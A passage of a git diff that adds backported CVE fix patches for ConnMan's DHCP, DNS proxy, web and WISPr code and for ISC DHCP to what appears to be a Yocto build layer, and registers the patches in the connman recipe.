+
+	if (condition & (G_IO_NVAL | G_IO_ERR | G_IO_HUP)) {
+@@ -661,12 +662,13 @@ static gboolean listener_event(GIOChannel *channel, GIOCondition condition,
+	re = dhcp_recv_l3_packet(&packet, dhcp_server->listener_sockfd);
+	if (re < 0)
+		return TRUE;
++	packet_len = (uint16_t)(unsigned int)re;
+
+-	type = check_packet_type(&packet);
++	type = check_packet_type(&packet, packet_len);
+	if (type == 0)
+		return TRUE;
+
+-	server_id_option = dhcp_get_option(&packet, DHCP_SERVER_ID);
++	server_id_option = dhcp_get_option(&packet, packet_len, DHCP_SERVER_ID);
+	if (server_id_option) {
+		uint32_t server_nid =
+			get_unaligned((const uint32_t *) server_id_option);
+@@ -675,7 +677,7 @@ static gboolean listener_event(GIOChannel *channel, GIOCondition condition,
+			return TRUE;
+	}
+
+-	request_ip_option = dhcp_get_option(&packet, DHCP_REQUESTED_IP);
++	request_ip_option = dhcp_get_option(&packet, packet_len, DHCP_REQUESTED_IP);
+	if (request_ip_option)
+		requested_nip = get_be32(request_ip_option);
+
+--
+2.17.1
diff --git a/meta/recipes-connectivity/connman/connman/CVE-2021-26676-0002.patch b/meta/recipes-connectivity/connman/connman/CVE-2021-26676-0002.patch
new file mode 100644
index 0000000000..ce909ec293
--- /dev/null
+++ b/meta/recipes-connectivity/connman/connman/CVE-2021-26676-0002.patch
@@ -0,0 +1,33 @@
+From a74524b3e3fad81b0fd1084ffdf9f2ea469cd9b1 Mon Sep 17 00:00:00 2001
+From: Colin Wee <cwee@tesla.com>
+Date: Thu, 28 Jan 2021 19:41:09 +0100
+Subject: [PATCH] gdhcp: Avoid leaking stack data via unitiialized variable
+
+Fixes: CVE-2021-26676
+
+Upstream-Status: Backport
+CVE: CVE-2021-26676
+
+Reference to upstream patch:
+https://git.kernel.org/pub/scm/network/connman/connman.git/commit/?id=a74524b3e3fad81b0fd1084ffdf9f2ea469cd9b1
+
+Signed-off-by: Catalin Enache <catalin.enache@windriver.com>
+---
+ gdhcp/client.c | 2 +-
+ 1 file changed, 1 insertion(+), 1 deletion(-)
+
+diff --git a/gdhcp/client.c b/gdhcp/client.c
+index 6a5613e7..c7b85e58 100644
+--- a/gdhcp/client.c
++++ b/gdhcp/client.c
+@@ -2270,7 +2270,7 @@ static gboolean listener_event(GIOChannel *channel, GIOCondition condition,
+ {
+	GDHCPClient *dhcp_client = user_data;
+	struct sockaddr_in dst_addr = { 0 };
+-	struct dhcp_packet packet;
++	struct dhcp_packet packet = { 0 };
+	struct dhcpv6_packet *packet6 = NULL;
+	uint8_t *message_type = NULL, *client_id = NULL, *option,
+		*server_id = NULL;
+--
+2.17.1
diff --git a/meta/recipes-connectivity/connman/connman/CVE-2021-33833.patch b/meta/recipes-connectivity/connman/connman/CVE-2021-33833.patch
new file mode 100644
index 0000000000..770948fb69
--- /dev/null
+++ b/meta/recipes-connectivity/connman/connman/CVE-2021-33833.patch
@@ -0,0 +1,72 @@
+From eceb2e8d2341c041df55a5e2f047d9a8c491463c Mon Sep 17 00:00:00 2001
+From: Valery Kashcheev <v.kascheev@omp.ru>
+Date: Mon, 7 Jun 2021 18:58:24 +0200
+Subject: dnsproxy: Check the length of buffers before memcpy
+
+Fix using a stack-based buffer overflow attack by checking the length of
+the ptr and uptr buffers.
+
+Fix debug message output.
+
+Fixes: CVE-2021-33833
+
+Upstream-Status: Backport
+https://git.kernel.org/pub/scm/network/connman/connman.git/commit/?id=eceb2e8d2341c041df55a5e2f047d9a8c491463c
+CVE: CVE-2021-33833
+Signed-off-by: Steve Sakoman <steve@sakoman.com>
+
+---
+ src/dnsproxy.c | 20 +++++++++++---------
+ 1 file changed, 11 insertions(+), 9 deletions(-)
+
+diff --git a/src/dnsproxy.c b/src/dnsproxy.c
+index de52df5a..38dbdd71 100644
+--- a/src/dnsproxy.c
++++ b/src/dnsproxy.c
+@@ -1788,17 +1788,15 @@ static char *uncompress(int16_t field_count, char *start, char *end,
+ 		 * tmp buffer.
+ 		 */
+ 
+-		debug("pos %d ulen %d left %d name %s", pos, ulen,
+-			(int)(uncomp_len - (uptr - uncompressed)), uptr);
+-
+-		ulen = strlen(name);
+-		if ((uptr + ulen + 1) > uncomp_end) {
++		ulen = strlen(name) + 1;
++		if ((uptr + ulen) > uncomp_end)
+ 			goto out;
+-		}
+-		strncpy(uptr, name, uncomp_len - (uptr - uncompressed));
++		strncpy(uptr, name, ulen);
++
++		debug("pos %d ulen %d left %d name %s", pos, ulen,
++			(int)(uncomp_end - (uptr + ulen)), uptr);
+ 
+ 		uptr += ulen;
+-		*uptr++ = '\0';
+ 
+ 		ptr += pos;
+ 
+@@ -1841,7 +1839,7 @@ static char *uncompress(int16_t field_count, char *start, char *end,
+ 		} else if (dns_type == ns_t_a || dns_type == ns_t_aaaa) {
+ 			dlen = uptr[-2] << 8 | uptr[-1];
+ 
+-			if (ptr + dlen > end) {
++			if ((ptr + dlen) > end || (uptr + dlen) > uncomp_end) {
+ 				debug("data len %d too long", dlen);
+ 				goto out;
+ 			}
+@@ -1880,6 +1878,10 @@ static char *uncompress(int16_t field_count, char *start, char *end,
+ 			 * refresh interval, retry interval, expiration
+ 			 * limit and minimum ttl). They are 20 bytes long.
+ 			 */
++			if ((uptr + 20) > uncomp_end || (ptr + 20) > end) {
++				debug("soa record too long");
++				goto out;
++			}
+ 			memcpy(uptr, ptr, 20);
+ 			uptr += 20;
+ 			ptr += 20;
+-- 
+cgit 1.2.3-1.el7
+
diff --git a/meta/recipes-connectivity/connman/connman/CVE-2022-23096-7.patch b/meta/recipes-connectivity/connman/connman/CVE-2022-23096-7.patch
new file mode 100644
index 0000000000..7f27474830
--- /dev/null
+++ b/meta/recipes-connectivity/connman/connman/CVE-2022-23096-7.patch
@@ -0,0 +1,121 @@
+From e5a313736e13c90d19085e953a26256a198e4950 Mon Sep 17 00:00:00 2001
+From: Daniel Wagner <wagi@monom.org>
+Date: Tue, 25 Jan 2022 10:00:24 +0100
+Subject: dnsproxy: Validate input data before using them
+
+dnsproxy is not validating various input data. Add a bunch of checks.
+
+Fixes: CVE-2022-23097
+Fixes: CVE-2022-23096
+
+Upstream-Status: Backport
+https://git.kernel.org/pub/scm/network/connman/connman.git/commit/?id=e5a313736e13c90d19085e953a26256a198e4950
+
+CVE: CVE-2022-23096 CVE-2022-23097
+Signed-off-by: Steve Sakoman <steve@sakoman.com>
+
+---
+ src/dnsproxy.c | 31 ++++++++++++++++++++++++++-----
+ 1 file changed, 26 insertions(+), 5 deletions(-)
+
+diff --git a/src/dnsproxy.c b/src/dnsproxy.c
+index cdfafbc2..c027bcb9 100644
+--- a/src/dnsproxy.c
++++ b/src/dnsproxy.c
+@@ -1951,6 +1951,12 @@ static int forward_dns_reply(unsigned char *reply, int reply_len, int protocol,
+ 
+ 	if (offset < 0)
+ 		return offset;
++	if (reply_len < 0)
++		return -EINVAL;
++	if (reply_len < offset + 1)
++		return -EINVAL;
++	if ((size_t)reply_len < sizeof(struct domain_hdr))
++		return -EINVAL;
+ 
+ 	hdr = (void *)(reply + offset);
+ 	dns_id = reply[offset] | reply[offset + 1] << 8;
+@@ -1986,23 +1992,31 @@ static int forward_dns_reply(unsigned char *reply, int reply_len, int protocol,
+ 		 */
+ 		if (req->append_domain && ntohs(hdr->qdcount) == 1) {
+ 			uint16_t domain_len = 0;
+-			uint16_t header_len;
++			uint16_t header_len, payload_len;
+ 			uint16_t dns_type, dns_class;
+ 			uint8_t host_len, dns_type_pos;
+ 			char uncompressed[NS_MAXDNAME], *uptr;
+ 			char *ptr, *eom = (char *)reply + reply_len;
++			char *domain;
+ 
+ 			/*
+ 			 * ptr points to the first char of the hostname.
+ 			 * ->hostname.domain.net
+ 			 */
+ 			header_len = offset + sizeof(struct domain_hdr);
++			if (reply_len < header_len)
++				return -EINVAL;
++			payload_len = reply_len - header_len;
++
+ 			ptr = (char *)reply + header_len;
+ 
+ 			host_len = *ptr;
++			domain = ptr + 1 + host_len;
++			if (domain > eom)
++				return -EINVAL;
++
+ 			if (host_len > 0)
+-				domain_len = strnlen(ptr + 1 + host_len,
+-						reply_len - header_len);
++				domain_len = strnlen(domain, eom - domain);
+ 
+ 			/*
+ 			 * If the query type is anything other than A or AAAA,
+@@ -2011,6 +2025,8 @@ static int forward_dns_reply(unsigned char *reply, int reply_len, int protocol,
+ 			 */
+ 			dns_type_pos = host_len + 1 + domain_len + 1;
+ 
++			if (ptr + (dns_type_pos + 3) > eom)
++				return -EINVAL;
+ 			dns_type = ptr[dns_type_pos] << 8 |
+ 							ptr[dns_type_pos + 1];
+ 			dns_class = ptr[dns_type_pos + 2] << 8 |
+@@ -2040,6 +2056,8 @@ static int forward_dns_reply(unsigned char *reply, int reply_len, int protocol,
+ 				int new_len, fixed_len;
+ 				char *answers;
+ 
++				if (len > payload_len)
++					return -EINVAL;
+ 				/*
+ 				 * First copy host (without domain name) into
+ 				 * tmp buffer.
+@@ -2054,6 +2072,8 @@ static int forward_dns_reply(unsigned char *reply, int reply_len, int protocol,
+ 				 * Copy type and class fields of the question.
+ 				 */
+ 				ptr += len + domain_len + 1;
++				if (ptr + NS_QFIXEDSZ > eom)
++					return -EINVAL;
+ 				memcpy(uptr, ptr, NS_QFIXEDSZ);
+ 
+ 				/*
+@@ -2063,6 +2083,8 @@ static int forward_dns_reply(unsigned char *reply, int reply_len, int protocol,
+ 				uptr += NS_QFIXEDSZ;
+ 				answers = uptr;
+ 				fixed_len = answers - uncompressed;
++				if (ptr + offset > eom)
++					return -EINVAL;
+ 
+ 				/*
+ 				 * We then uncompress the result to buffer
+@@ -2257,8 +2279,7 @@ static gboolean udp_server_event(GIOChannel *channel, GIOCondition condition,
+ 
+ 	len = recv(sk, buf, sizeof(buf), 0);
+ 
+-	if (len >= 12)
+-		forward_dns_reply(buf, len, IPPROTO_UDP, data);
++	forward_dns_reply(buf, len, IPPROTO_UDP, data);
+ 
+ 	return TRUE;
+ }
+-- 
+cgit 1.2.3-1.el7
+
diff --git a/meta/recipes-connectivity/connman/connman/CVE-2022-23098.patch b/meta/recipes-connectivity/connman/connman/CVE-2022-23098.patch
new file mode 100644
index 0000000000..a40c9f583f
--- /dev/null
+++ b/meta/recipes-connectivity/connman/connman/CVE-2022-23098.patch
@@ -0,0 +1,50 @@
+From d8708b85c1e8fe25af7803e8a20cf20e7201d8a4 Mon Sep 17 00:00:00 2001
+From: Matthias Gerstner <mgerstner@suse.de>
+Date: Tue, 25 Jan 2022 10:00:25 +0100
+Subject: dnsproxy: Avoid 100 % busy loop in TCP server case
+
+Once the TCP socket is connected and until the remote server is
+responding (if ever) ConnMan executes a 100 % CPU loop, since
+the connected socket will always be writable (G_IO_OUT).
+
+To fix this, modify the watch after the connection is established to
+remove the G_IO_OUT from the callback conditions.
+
+Fixes: CVE-2022-23098
+
+Upstream-Status: Backport
+https://git.kernel.org/pub/scm/network/connman/connman.git/commit/?id=d8708b85c1e8fe25af7803e8a20cf20e7201d8a4
+
+CVE: CVE-2022-23098
+Signed-off-by: Steve Sakoman <steve@sakoman.com>
+
+---
+ src/dnsproxy.c | 12 ++++++++++++
+ 1 file changed, 12 insertions(+)
+
+diff --git a/src/dnsproxy.c b/src/dnsproxy.c
+index c027bcb9..1ccf36a9 100644
+--- a/src/dnsproxy.c
++++ b/src/dnsproxy.c
+@@ -2360,6 +2360,18 @@ hangup:
+ 			}
+ 		}
+ 
++		/*
++		 * Remove the G_IO_OUT flag from the watch, otherwise we end
++		 * up in a busy loop, because the socket is constantly writable.
++		 *
++		 * There seems to be no better way in g_io to do that than
++		 * re-adding the watch.
++		 */
++		g_source_remove(server->watch);
++		server->watch = g_io_add_watch(server->channel,
++			G_IO_IN | G_IO_HUP | G_IO_NVAL | G_IO_ERR,
++			tcp_server_event, server);
++
+ 		server->connected = true;
+ 		server_list = g_slist_append(server_list, server);
+ 
+-- 
+cgit 1.2.3-1.el7
+
diff --git a/meta/recipes-connectivity/connman/connman/CVE-2022-32292.patch b/meta/recipes-connectivity/connman/connman/CVE-2022-32292.patch
new file mode 100644
index 0000000000..74a739d6a2
--- /dev/null
+++ b/meta/recipes-connectivity/connman/connman/CVE-2022-32292.patch
@@ -0,0 +1,37 @@
+From d1a5ede5d255bde8ef707f8441b997563b9312bd Mon Sep 17 00:00:00 2001
+From: Nathan Crandall <ncrandall@tesla.com>
+Date: Tue, 12 Jul 2022 08:56:34 +0200
+Subject: gweb: Fix OOB write in received_data()
+
+There is a mismatch of handling binary vs. C-string data with memchr
+and strlen, resulting in pos, count, and bytes_read to become out of
+sync and result in a heap overflow.  Instead, do not treat the buffer
+as an ASCII C-string. We calculate the count based on the return value
+of memchr, instead of strlen.
+
+Fixes: CVE-2022-32292
+
+Upstream-Status: Backport
+https://git.kernel.org/pub/scm/network/connman/connman.git/commit/?id=d1a5ede5d255bde8ef707f8441b997563b9312b
+CVE: CVE-2022-32292
+Signed-off-by: Lee Chee Yang <chee.yang.lee@intel.com>
+---
+ gweb/gweb.c | 2 +-
+ 1 file changed, 1 insertion(+), 1 deletion(-)
+
+diff --git a/gweb/gweb.c b/gweb/gweb.c
+index 12fcb1d8..13c6c5f2 100644
+--- a/gweb/gweb.c
++++ b/gweb/gweb.c
+@@ -918,7 +918,7 @@ static gboolean received_data(GIOChannel *channel, GIOCondition cond,
+ 		}
+ 
+ 		*pos = '\0';
+-		count = strlen((char *) ptr);
++		count = pos - ptr;
+ 		if (count > 0 && ptr[count - 1] == '\r') {
+ 			ptr[--count] = '\0';
+ 			bytes_read--;
+-- 
+cgit 
+
diff --git a/meta/recipes-connectivity/connman/connman/CVE-2022-32293.patch b/meta/recipes-connectivity/connman/connman/CVE-2022-32293.patch
new file mode 100644
index 0000000000..83a013981c
--- /dev/null
+++ b/meta/recipes-connectivity/connman/connman/CVE-2022-32293.patch
@@ -0,0 +1,266 @@
+From 358a44b1442fae0f82846e10da0708b5c4e1ce27 Mon Sep 17 00:00:00 2001
+From: Hitendra Prajapati <hprajapati@mvista.com>
+Date: Tue, 20 Sep 2022 17:58:19 +0530
+Subject: [PATCH] CVE-2022-32293
+
+CVE: CVE-2022-32293
+Upstream-Status: Backport [https://git.kernel.org/pub/scm/network/connman/connman.git/commit/?id=72343929836de80727a27d6744c869dff045757c && https://git.kernel.org/pub/scm/network/connman/connman.git/commit/src/wispr.c?id=416bfaff988882c553c672e5bfc2d4f648d29e8a]
+Signed-off-by: Hitendra Prajapati <hprajapati@mvista.com>
+---
+ src/wispr.c | 83 ++++++++++++++++++++++++++++++++++++++++-------------
+ 1 file changed, 63 insertions(+), 20 deletions(-)
+
+diff --git a/src/wispr.c b/src/wispr.c
+index 473c0e0..97e0242 100644
+--- a/src/wispr.c
++++ b/src/wispr.c
+@@ -59,6 +59,7 @@ struct wispr_route {
+ };
+ 
+ struct connman_wispr_portal_context {
++	int refcount;
+ 	struct connman_service *service;
+ 	enum connman_ipconfig_type type;
+ 	struct connman_wispr_portal *wispr_portal;
+@@ -96,10 +97,13 @@ static bool wispr_portal_web_result(GWebResult *result, gpointer user_data);
+ 
+ static GHashTable *wispr_portal_list = NULL;
+ 
++#define wispr_portal_context_ref(wp_context) \
++	wispr_portal_context_ref_debug(wp_context, __FILE__, __LINE__, __func__)
++#define wispr_portal_context_unref(wp_context) \
++	wispr_portal_context_unref_debug(wp_context, __FILE__, __LINE__, __func__)
++
+ static void connman_wispr_message_init(struct connman_wispr_message *msg)
+ {
+-	DBG("");
+-
+ 	msg->has_error = false;
+ 	msg->current_element = NULL;
+ 
+@@ -159,11 +163,6 @@ static void free_wispr_routes(struct connman_wispr_portal_context *wp_context)
+ static void free_connman_wispr_portal_context(
+ 		struct connman_wispr_portal_context *wp_context)
+ {
+-	DBG("context %p", wp_context);
+-
+-	if (!wp_context)
+-		return;
+-
+ 	if (wp_context->wispr_portal) {
+ 		if (wp_context->wispr_portal->ipv4_context == wp_context)
+ 			wp_context->wispr_portal->ipv4_context = NULL;
+@@ -200,9 +199,38 @@ static void free_connman_wispr_portal_context(
+ 	g_free(wp_context);
+ }
+ 
++static struct connman_wispr_portal_context *
++wispr_portal_context_ref_debug(struct connman_wispr_portal_context *wp_context,
++			const char *file, int line, const char *caller)
++{
++	DBG("%p ref %d by %s:%d:%s()", wp_context,
++		wp_context->refcount + 1, file, line, caller);
++
++	__sync_fetch_and_add(&wp_context->refcount, 1);
++
++	return wp_context;
++}
++
++static void wispr_portal_context_unref_debug(
++		struct connman_wispr_portal_context *wp_context,
++		const char *file, int line, const char *caller)
++{
++	if (!wp_context)
++		return;
++
++	DBG("%p ref %d by %s:%d:%s()", wp_context,
++		wp_context->refcount - 1, file, line, caller);
++
++	if (__sync_fetch_and_sub(&wp_context->refcount, 1) != 1)
++		return;
++
++	free_connman_wispr_portal_context(wp_context);
++}
++
+ static struct connman_wispr_portal_context *create_wispr_portal_context(void)
+ {
+-	return g_try_new0(struct connman_wispr_portal_context, 1);
++	return wispr_portal_context_ref(
++		g_new0(struct connman_wispr_portal_context, 1));
+ }
+ 
+ static void free_connman_wispr_portal(gpointer data)
+@@ -214,8 +242,8 @@ static void free_connman_wispr_portal(gpointer data)
+ 	if (!wispr_portal)
+ 		return;
+ 
+-	free_connman_wispr_portal_context(wispr_portal->ipv4_context);
+-	free_connman_wispr_portal_context(wispr_portal->ipv6_context);
++	wispr_portal_context_unref(wispr_portal->ipv4_context);
++	wispr_portal_context_unref(wispr_portal->ipv6_context);
+ 
+ 	g_free(wispr_portal);
+ }
+@@ -450,8 +478,6 @@ static void portal_manage_status(GWebResult *result,
+ 				&str))
+ 		connman_info("Client-Timezone: %s", str);
+ 
+-	free_connman_wispr_portal_context(wp_context);
+-
+ 	__connman_service_ipconfig_indicate_state(service,
+ 					CONNMAN_SERVICE_STATE_ONLINE, type);
+ }
+@@ -509,14 +535,17 @@ static void wispr_portal_request_portal(
+ {
+ 	DBG("");
+ 
++	wispr_portal_context_ref(wp_context);
+ 	wp_context->request_id = g_web_request_get(wp_context->web,
+ 					wp_context->status_url,
+ 					wispr_portal_web_result,
+ 					wispr_route_request,
+ 					wp_context);
+ 
+-	if (wp_context->request_id == 0)
++	if (wp_context->request_id == 0) {
+ 		wispr_portal_error(wp_context);
++		wispr_portal_context_unref(wp_context);
++	}
+ }
+ 
+ static bool wispr_input(const guint8 **data, gsize *length,
+@@ -562,13 +591,15 @@ static void wispr_portal_browser_reply_cb(struct connman_service *service,
+ 		return;
+ 
+ 	if (!authentication_done) {
+-		wispr_portal_error(wp_context);
+ 		free_wispr_routes(wp_context);
++		wispr_portal_error(wp_context);
++		wispr_portal_context_unref(wp_context);
+ 		return;
+ 	}
+ 
+ 	/* Restarting the test */
+ 	__connman_service_wispr_start(service, wp_context->type);
++	wispr_portal_context_unref(wp_context);
+ }
+ 
+ static void wispr_portal_request_wispr_login(struct connman_service *service,
+@@ -592,7 +623,7 @@ static void wispr_portal_request_wispr_login(struct connman_service *service,
+ 				return;
+ 		}
+ 
+-		free_connman_wispr_portal_context(wp_context);
++		wispr_portal_context_unref(wp_context);
+ 		return;
+ 	}
+ 
+@@ -644,11 +675,13 @@ static bool wispr_manage_message(GWebResult *result,
+ 
+ 		wp_context->wispr_result = CONNMAN_WISPR_RESULT_LOGIN;
+ 
++		wispr_portal_context_ref(wp_context);
+ 		if (__connman_agent_request_login_input(wp_context->service,
+ 					wispr_portal_request_wispr_login,
+-					wp_context) != -EINPROGRESS)
++					wp_context) != -EINPROGRESS) {
+ 			wispr_portal_error(wp_context);
+-		else
++			wispr_portal_context_unref(wp_context);
++		} else
+ 			return true;
+ 
+ 		break;
+@@ -697,6 +730,7 @@ static bool wispr_portal_web_result(GWebResult *result, gpointer user_data)
+ 		if (length > 0) {
+ 			g_web_parser_feed_data(wp_context->wispr_parser,
+ 								chunk, length);
++			wispr_portal_context_unref(wp_context);
+ 			return true;
+ 		}
+ 
+@@ -714,6 +748,7 @@ static bool wispr_portal_web_result(GWebResult *result, gpointer user_data)
+ 
+ 	switch (status) {
+ 	case 000:
++		wispr_portal_context_ref(wp_context);
+ 		__connman_agent_request_browser(wp_context->service,
+ 				wispr_portal_browser_reply_cb,
+ 				wp_context->status_url, wp_context);
+@@ -725,11 +760,14 @@ static bool wispr_portal_web_result(GWebResult *result, gpointer user_data)
+ 		if (g_web_result_get_header(result, "X-ConnMan-Status",
+ 						&str)) {
+ 			portal_manage_status(result, wp_context);
++			wispr_portal_context_unref(wp_context);
+ 			return false;
+-		} else
++		} else {
++			wispr_portal_context_ref(wp_context);
+ 			__connman_agent_request_browser(wp_context->service,
+ 					wispr_portal_browser_reply_cb,
+ 					wp_context->redirect_url, wp_context);
++		}
+ 
+ 		break;
+ 	case 302:
+@@ -737,6 +775,7 @@ static bool wispr_portal_web_result(GWebResult *result, gpointer user_data)
+ 			!g_web_result_get_header(result, "Location",
+ 							&redirect)) {
+ 
++			wispr_portal_context_ref(wp_context);
+ 			__connman_agent_request_browser(wp_context->service,
+ 					wispr_portal_browser_reply_cb,
+ 					wp_context->status_url, wp_context);
+@@ -747,6 +786,7 @@ static bool wispr_portal_web_result(GWebResult *result, gpointer user_data)
+ 
+ 		wp_context->redirect_url = g_strdup(redirect);
+ 
++		wispr_portal_context_ref(wp_context);
+ 		wp_context->request_id = g_web_request_get(wp_context->web,
+ 				redirect, wispr_portal_web_result,
+ 				wispr_route_request, wp_context);
+@@ -763,6 +803,7 @@ static bool wispr_portal_web_result(GWebResult *result, gpointer user_data)
+ 
+ 		break;
+ 	case 505:
++		wispr_portal_context_ref(wp_context);
+ 		__connman_agent_request_browser(wp_context->service,
+ 				wispr_portal_browser_reply_cb,
+ 				wp_context->status_url, wp_context);
+@@ -775,6 +816,7 @@ static bool wispr_portal_web_result(GWebResult *result, gpointer user_data)
+ 	wp_context->request_id = 0;
+ done:
+ 	wp_context->wispr_msg.message_type = -1;
++	wispr_portal_context_unref(wp_context);
+ 	return false;
+ }
+ 
+@@ -809,6 +851,7 @@ static void proxy_callback(const char *proxy, void *user_data)
+ 					xml_wispr_parser_callback, wp_context);
+ 
+ 	wispr_portal_request_portal(wp_context);
++	wispr_portal_context_unref(wp_context);
+ }
+ 
+ static gboolean no_proxy_callback(gpointer user_data)
+@@ -903,7 +946,7 @@ static int wispr_portal_detect(struct connman_wispr_portal_context *wp_context)
+ 
+ 		if (wp_context->token == 0) {
+ 			err = -EINVAL;
+-			free_connman_wispr_portal_context(wp_context);
++			wispr_portal_context_unref(wp_context);
+ 		}
+ 	} else if (wp_context->timeout == 0) {
+ 		wp_context->timeout = g_idle_add(no_proxy_callback, wp_context);
+@@ -952,7 +995,7 @@ int __connman_wispr_start(struct connman_service *service,
+ 
+ 	/* If there is already an existing context, we wipe it */
+ 	if (wp_context)
+-		free_connman_wispr_portal_context(wp_context);
++		wispr_portal_context_unref(wp_context);
+ 
+ 	wp_context = create_wispr_portal_context();
+ 	if (!wp_context)
+-- 
+2.25.1
+
diff --git a/meta/recipes-connectivity/connman/connman/CVE-2023-28488.patch b/meta/recipes-connectivity/connman/connman/CVE-2023-28488.patch
new file mode 100644
index 0000000000..ea1601cc04
--- /dev/null
+++ b/meta/recipes-connectivity/connman/connman/CVE-2023-28488.patch
@@ -0,0 +1,54 @@
+From 99e2c16ea1cced34a5dc450d76287a1c3e762138 Mon Sep 17 00:00:00 2001
+From: Daniel Wagner <wagi@monom.org>
+Date: Tue, 11 Apr 2023 08:12:56 +0200
+Subject: gdhcp: Verify and sanitize packet length first
+
+Upstream-Status: Backport [https://git.kernel.org/pub/scm/network/connman/connman.git/patch/?id=99e2c16ea1cced34a5dc450d76287a1c3e762138]
+CVE: CVE-2023-28488
+Signed-off-by: Ashish Sharma <asharma@mvista.com>
+
+ gdhcp/client.c | 16 +++++++++-------
+ 1 file changed, 9 insertions(+), 7 deletions(-)
+
+diff --git a/gdhcp/client.c b/gdhcp/client.c
+index 7efa7e45..82017692 100644
+--- a/gdhcp/client.c
++++ b/gdhcp/client.c
+@@ -1319,9 +1319,9 @@ static bool sanity_check(struct ip_udp_dhcp_packet *packet, int bytes)
+ static int dhcp_recv_l2_packet(struct dhcp_packet *dhcp_pkt, int fd,
+ 				struct sockaddr_in *dst_addr)
+ {
+-	int bytes;
+ 	struct ip_udp_dhcp_packet packet;
+ 	uint16_t check;
++	int bytes, tot_len;
+ 
+ 	memset(&packet, 0, sizeof(packet));
+ 
+@@ -1329,15 +1329,17 @@ static int dhcp_recv_l2_packet(struct dhcp_packet *dhcp_pkt, int fd,
+ 	if (bytes < 0)
+ 		return -1;
+ 
+-	if (bytes < (int) (sizeof(packet.ip) + sizeof(packet.udp)))
+-		return -1;
+-
+-	if (bytes < ntohs(packet.ip.tot_len))
++	tot_len = ntohs(packet.ip.tot_len);
++	if (bytes > tot_len) {
++		/* ignore any extra garbage bytes */
++		bytes = tot_len;
++	} else if (bytes < tot_len) {
+ 		/* packet is bigger than sizeof(packet), we did partial read */
+ 		return -1;
++	}
+ 
+-	/* ignore any extra garbage bytes */
+-	bytes = ntohs(packet.ip.tot_len);
++	if (bytes < (int) (sizeof(packet.ip) + sizeof(packet.udp)))
++		return -1;
+ 
+ 	if (!sanity_check(&packet, bytes))
+ 		return -1;
+-- 
+cgit 
+
diff --git a/meta/recipes-connectivity/connman/connman_1.37.bb b/meta/recipes-connectivity/connman/connman_1.37.bb
index 00852bf0d6..8062a094d3 100644
--- a/meta/recipes-connectivity/connman/connman_1.37.bb
+++ b/meta/recipes-connectivity/connman/connman_1.37.bb
@@ -6,6 +6,15 @@ SRC_URI  = "${KERNELORG_MIRROR}/linux/network/${BPN}/${BP}.tar.xz \
             file://0001-gweb-fix-segfault-with-musl-v1.1.21.patch \
             file://connman \
             file://no-version-scripts.patch \
+            file://CVE-2021-26675.patch \
+            file://CVE-2021-26676-0001.patch \
+            file://CVE-2021-26676-0002.patch \
+            file://CVE-2021-33833.patch \
+            file://CVE-2022-23096-7.patch \
+            file://CVE-2022-23098.patch \
+            file://CVE-2022-32292.patch \
+	     file://CVE-2022-32293.patch \
+            file://CVE-2023-28488.patch \
 "
 
 SRC_URI_append_libc-musl = " file://0002-resolve-musl-does-not-implement-res_ninit.patch"
diff --git a/meta/recipes-connectivity/dhcp/dhcp/CVE-2021-25217.patch b/meta/recipes-connectivity/dhcp/dhcp/CVE-2021-25217.patch
new file mode 100644
index 0000000000..91aaf83a77
--- /dev/null
+++ b/meta/recipes-connectivity/dhcp/dhcp/CVE-2021-25217.patch
@@ -0,0 +1,66 @@
+From 5a7344b05081d84343a1627e47478f3990b17700 Mon Sep 17 00:00:00 2001
+From: Minjae Kim <flowergom@gmail.com>
+Date: Thu, 8 Jul 2021 00:08:25 +0000
+Subject: [PATCH] ISC has disclosed a vulnerability in ISC DHCP
+ (CVE-2021-25217)
+
+On May 26, 2021, we (Internet Systems Consortium) disclosed a
+vulnerability affecting our ISC DHCP software:
+
+    CVE-2021-25217: A buffer overrun in lease file parsing code can be
+    used to exploit a common vulnerability shared by dhcpd and dhclient
+    https://kb.isc.org/docs/cve-2021-25217
+
+New versions of ISC DHCP are available from https://www.isc.org/downloads
+
+Operators and package maintainers who prefer to apply patches selectively can
+find individual vulnerability-specific patches in the "patches" subdirectory
+of the release directories for our two stable release branches (4.4 and 4.1-ESV)
+
+   https://downloads.isc.org/isc/dhcp/4.4.2-P1/patches
+   https://downloads.isc.org/isc/dhcp/4.1-ESV-R16-P1/patches
+
+With the public announcement of this vulnerability, the embargo
+period is ended and any updated software packages that have been
+prepared may be released.
+
+Upstream-Status: Accepted [https://www.openwall.com/lists/oss-security/2021/05/26/6]
+CVE: CVE-2021-25217
+Signed-off-by: Minjae Kim <flowergom@gmail.com>
+---
+ common/parse.c | 7 ++++---
+ 1 file changed, 4 insertions(+), 3 deletions(-)
+
+diff --git a/common/parse.c b/common/parse.c
+index 386a632..fc7b39c 100644
+--- a/common/parse.c
++++ b/common/parse.c
+@@ -3,7 +3,7 @@
+    Common parser code for dhcpd and dhclient. */
+ 
+ /*
+- * Copyright (c) 2004-2019 by Internet Systems Consortium, Inc. ("ISC")
++ * Copyright (c) 2004-2021 by Internet Systems Consortium, Inc. ("ISC")
+  * Copyright (c) 1995-2003 by Internet Software Consortium
+  *
+  * This Source Code Form is subject to the terms of the Mozilla Public
+@@ -5556,13 +5556,14 @@ int parse_X (cfile, buf, max)
+ 				skip_to_semi (cfile);
+ 				return 0;
+ 			}
+-			convert_num (cfile, &buf [len], val, 16, 8);
+-			if (len++ > max) {
++			if (len >= max) {
+ 				parse_warn (cfile,
+ 					    "hexadecimal constant too long.");
+ 				skip_to_semi (cfile);
+ 				return 0;
+ 			}
++			convert_num (cfile, &buf [len], val, 16, 8);
++			len++;
+ 			token = peek_token (&val, (unsigned *)0, cfile);
+ 			if (token == COLON)
+ 				token = next_token (&val,
+-- 
+2.17.1
+
diff --git a/meta/recipes-connectivity/dhcp/dhcp/CVE-2022-2928.patch b/meta/recipes-connectivity/dhcp/dhcp/CVE-2022-2928.patch
new file mode 100644
index 0000000000..11f162cbda
--- /dev/null
+++ b/meta/recipes-connectivity/dhcp/dhcp/CVE-2022-2928.patch
@@ -0,0 +1,120 @@
+From 8a5d739eea10ee6e193f053b1662142d5657cbc6 Mon Sep 17 00:00:00 2001
+From: Hitendra Prajapati <hprajapati@mvista.com>
+Date: Thu, 6 Oct 2022 09:39:18 +0530
+Subject: [PATCH] CVE-2022-2928
+
+Upstream-Status: Backport [https://downloads.isc.org/isc/dhcp/4.4.3-P1/patches/]
+CVE: CVE-2022-2928
+Signed-off-by: Hitendra Prajapati <hprajapati@mvista.com>
+---
+ common/options.c               |  7 +++++
+ common/tests/option_unittest.c | 54 ++++++++++++++++++++++++++++++++++
+ 2 files changed, 61 insertions(+)
+
